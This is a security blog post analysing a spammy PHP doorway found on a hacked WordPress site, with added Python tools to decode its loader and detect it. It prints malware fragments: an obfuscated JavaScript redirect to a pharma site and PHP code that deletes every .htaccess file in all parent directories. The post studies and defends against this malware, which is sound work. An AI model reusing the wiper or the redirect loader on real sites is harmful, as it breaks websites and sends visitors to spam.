Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Most Contradictive Doorway Generator

   12 Sep 14   Filed in Short Attack Reviews

Check this thread on the WordPress.org forum. The topic starter found a suspicious PHP file and asked what it was doing.

The code analysis shows that it’s some sort of spammy doorway. But it’s a very strange doorway, and the way it works doesn’t make sense to me.

First of all, this script has a random text and code generator. The output it generates is [kind of] always unique. Here are a couple of output pages:

http://pastebin.com/ymwMZMWP
http://pastebin.com/Y6B7WM2T

...
<title>Is. Last spots brows: Dwelling. Immediately moral.</title>
</head>
<body>listend40721
<span>Flowerill merry chimes - has: Her - again spirits they, wooers. Delight preserve. For he. Free - snow set - grave lapped, icecold made myself visitings allow, beeves twas. Now one:
...

We usually see such random text when spammers want search engines to index “unique” content with the “right” keywords. But…

1. The script returns the page with a 404 Not Found status code.

header("HTTP/1.1 404 Not Found");

so the page won’t be indexed by search engines.

2. The obfuscated JavaScript code at the bottom of the generated page redirects to a pharma site after about a second.

function falselye() {
    falselya=29;
    falselyb=[148,134,139,129,140,148,75,145,140,141,75,137,140,128,126,145,134,140,139,75,133,143,130,131,90,68,133,145,145,141,87,76,76,145,126,127,137,130,145,138,130,129,134,128,126,143,130,144,75,130,146,68,88];
    falselyc="";
    for(falselyd=0;falselyd<falselyb.length;falselyd++) {
        falselyc+=String.fromCharCode(falselyb[falselyd]-falselya);  // subtract the offset from every char code
    }
    return falselyc;
}
setTimeout(falselye(),1263);  // the decoded string (not a function) is passed to setTimeout, so it is evaluated as code after 1263 ms

Decoded:

window.top.location.href='hxxp://tabletmedicares .eu';

Update: on another site the script redirected to hxxp://uanlwkis .com (also a pharma site), which had been registered only a few days earlier, on Sept 6th, 2014.
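As an added example (not code from the original post or from the malware author), here is a small Python decoder for this family of loaders that recovers the hidden string without running any JavaScript. It assumes the loader has exactly the shape quoted above (one numeric offset variable, one numeric array, and a `String.fromCharCode(array[i] - offset)` expression tying them together); the regular expressions are written for that shape and may need adjusting for other samples. The input is the loader quoted above, embedded here as a constructed sample, and the `defang` helper is my own convention for reporting the result.

```python
import re

# Constructed input: the obfuscated loader quoted above, with the numeric array
# copied from the post (no other part of the malware is reproduced here).
SAMPLE_JS = (
    "function falselye() { falselya=29; falselyb=[148,134,139,129,140,148,75,145,"
    "140,141,75,137,140,128,126,145,134,140,139,75,133,143,130,131,90,68,133,145,"
    "145,141,87,76,76,145,126,127,137,130,145,138,130,129,134,128,126,143,130,144,"
    "75,130,146,68,88]; falselyc=\"\"; "
    "for(falselyd=0;falselyd<falselyb.length;falselyd++) { "
    "falselyc+=String.fromCharCode(falselyb[falselyd]-falselya); } "
    "return falselyc; } setTimeout(falselye(),1263);"
)

# Assumption about the loader family: one numeric offset, one numeric array, and a
# String.fromCharCode(array[i] - offset) expression that names both of them.
OFFSET_RE = re.compile(r"(\w+)\s*=\s*(\d+)\s*;")
ARRAY_RE = re.compile(r"(\w+)\s*=\s*\[([\d,\s]+)\]")
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*(\w+)\[\w+\]\s*-\s*(\w+)\s*\)")
DELAY_RE = re.compile(r"setTimeout\([^,]+,\s*(\d+)\s*\)")


def decode_charcode_loader(js: str) -> str:
    """Rebuild the string the loader assembles, without evaluating any JavaScript."""
    m = CHARCODE_RE.search(js)
    if m is None:
        raise ValueError("no fromCharCode(array[i] - offset) expression found")
    array_name, offset_name = m.group(1), m.group(2)

    # Collect every "name=number;" and "name=[numbers]" assignment, then pick the
    # two that the fromCharCode expression actually refers to.
    offsets = {name: int(value) for name, value in OFFSET_RE.findall(js)}
    arrays = {
        name: [int(x) for x in body.replace(" ", "").split(",") if x]
        for name, body in ARRAY_RE.findall(js)
    }
    if array_name not in arrays or offset_name not in offsets:
        raise ValueError("array %r or offset %r is never assigned" % (array_name, offset_name))

    return "".join(chr(code - offsets[offset_name]) for code in arrays[array_name])


def redirect_delay_ms(js: str):
    """Return the setTimeout delay in milliseconds, or None if there is none."""
    m = DELAY_RE.search(js)
    return int(m.group(1)) if m else None


def extract_redirect_target(decoded: str):
    """Pull the URL out of a location.href='...' assignment, or None."""
    m = re.search(r"location\.href\s*=\s*'([^']+)'", decoded)
    return m.group(1) if m else None


def defang(url: str) -> str:
    """Make a URL safe to paste into a report: http -> hxxp, '.' -> '[.]' in the host."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


if __name__ == "__main__":
    payload = decode_charcode_loader(SAMPLE_JS)
    print("evaluated after %s ms: %s" % (redirect_delay_ms(SAMPLE_JS), payload))
    target = extract_redirect_target(payload)
    if target:
        print("redirect target:", defang(target))
```

Because the loader hands the decoded string (not a function) to `setTimeout`, the string is exactly what the browser evaluates after the delay, so static decoding shows the full behaviour with nothing executed.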

But the generated text has no pharma keywords. One more hint that it’s not for search engines. Maybe it’s an intermediary landing page of some email spam campaign that just needs to redirect visitors? I have seen many such landing pages on hacked sites. But in most cases they looked like the decoded version of the script — just a redirection code. Indeed, why bother with a sophisticated random page generator if no one (neither humans nor robots) is going to read it?

3. There is also this strange piece of code:

$s='/';
if (strtolower(substr(PHP_OS,0,3))=='win') $s="\\\\";   // directory separator for the OS
$d=array(".$s");   // start with the current directory
$p="";
for($i=1; $i<255; $i++){   // climb up to 254 levels: ../, ../../, ... until is_dir() fails
    $p.="..$s";
    if (is_dir($p)){
        array_push($d,$p);
    }
    else{break;}
}
foreach($d as $p){
    $a="h"."tac"."c"."es"."s";   // "htaccess", assembled piecewise so the name never appears literally
    $a1=$p.".$a";        // .htaccess
    $a2=$p.$a;           // htaccess
    $a3=$p."$a.txt";     // htaccess.txt
    @chmod($a1,0666);@unlink($a1);   // make writable, then delete; errors suppressed with @
    @chmod($a2,0666);@unlink($a2);
    @chmod($a3,0666);@unlink($a3);
}

What it does is try to find and delete(!) every file named .htaccess, htaccess or htaccess.txt in the current directory and in all(!) of the directories above it.

That just doesn’t make sense. Why is it trying to corrupt websites? I would understand if it only removed its own files and injected code into legitimate files, but it simply tries to remove every .htaccess (and its typical backups) without checking what’s inside. That’s a really disruptive and annoying behavior, given that many sites rely on the settings in .htaccess (e.g. most WordPress and Joomla sites).
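As an added example (my own code, not part of the original post), here is a small Python scanner that flags PHP files carrying the combination of traits described above: a forced 404 header, a loop that climbs parent directories with "..$s", chmod immediately followed by unlink, and the file name "htaccess" assembled from concatenated string pieces. The indicator names and the scoring rule are my assumptions; the suspicious input is the PHP quoted above pasted together as a constructed sample, and the benign control is a constructed plugin that legitimately writes its own .htaccess, included to show that a 404 header or the word "htaccess" alone must not trigger the verdict.

```python
import re

# Constructed sample: the PHP fragments quoted in the post, pasted together to stand
# in for the suspicious file.  The real file is larger; only what the post shows is here.
SUSPICIOUS_PHP = r'''<?php
header("HTTP/1.1 404 Not Found");
$s='/';
if (strtolower(substr(PHP_OS,0,3))=='win') $s="\\\\";
$d=array(".$s");
$p="";
for($i=1; $i<255; $i++){
$p.="..$s";
if (is_dir($p)){ array_push($d,$p); } else{break;}
}
foreach($d as $p){
$a="h"."tac"."c"."es"."s";
$a1=$p.".$a"; $a2=$p.$a; $a3=$p."$a.txt";
@chmod($a1,0666);@unlink($a1);
@chmod($a2,0666);@unlink($a2);
@chmod($a3,0666);@unlink($a3);
}
'''

# Constructed control: a plugin that legitimately writes its own .htaccess and also
# happens to send a 404.  It must not be flagged.
BENIGN_PHP = r'''<?php
$rules = "Options -Indexes\n";
file_put_contents(__DIR__ . '/' . "." . "htaccess", $rules);
header("HTTP/1.1 404 Not Found");
'''

# A run of double-quoted literals joined with PHP's "." operator, and the literals inside it.
CONCAT_RUN_RE = re.compile(r'"[^"\n]*"(?:\s*\.\s*"[^"\n]*")+')
LITERAL_RE = re.compile(r'"([^"\n]*)"')

INDICATORS = {
    # a 404 sent by a script that still serves content: common and harmless on its own
    "fake_404": re.compile(r'header\(\s*["\']HTTP/1\.[01] 404'),
    # building "../" (or "..$sep") to climb out of the current directory
    "parent_dir_walk": re.compile(r'"\.\.(?:\$\w+|/)"'),
    # chmod immediately followed by unlink, as in the sample
    "chmod_then_unlink": re.compile(r'@?chmod\([^;]*\);\s*@?unlink\('),
}


def split_literal_runs(src: str):
    """Yield the pieces of every run of concatenated double-quoted literals."""
    for run in CONCAT_RUN_RE.finditer(src):
        yield LITERAL_RE.findall(run.group(0))


def has_split_htaccess(src: str) -> bool:
    """True when 'htaccess' appears only after the pieces are joined, i.e. the name
    was deliberately split so that a plain search for it finds nothing."""
    for pieces in split_literal_runs(src):
        joined = "".join(pieces)
        if "htaccess" in joined and not any("htaccess" in p for p in pieces):
            return True
    return False


def scan_php(src: str) -> dict:
    """Evaluate every indicator against one PHP source text."""
    hits = {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}
    hits["split_string_htaccess"] = has_split_htaccess(src)
    return hits


def is_htaccess_wiper(hits: dict) -> bool:
    """Verdict for the behaviour described in the post: either the split file name,
    or the directory climb combined with chmod+unlink.  A bare 404 is never enough."""
    return hits["split_string_htaccess"] or (
        hits["parent_dir_walk"] and hits["chmod_then_unlink"]
    )


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_PHP), ("benign", BENIGN_PHP)):
        hits = scan_php(src)
        print(label, hits, "->", "FLAG" if is_htaccess_wiper(hits) else "ok")
```

To use it on a real site, read each .php file under the web root into `scan_php` and review anything `is_htaccess_wiper` flags; a hit on `fake_404` alone should be ignored, which is why the verdict function does not count it.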

It’s indeed the most contradictive doorway generator I have ever seen. I can’t find any good explanation for why it does things the way it does. Maybe you have some ideas?
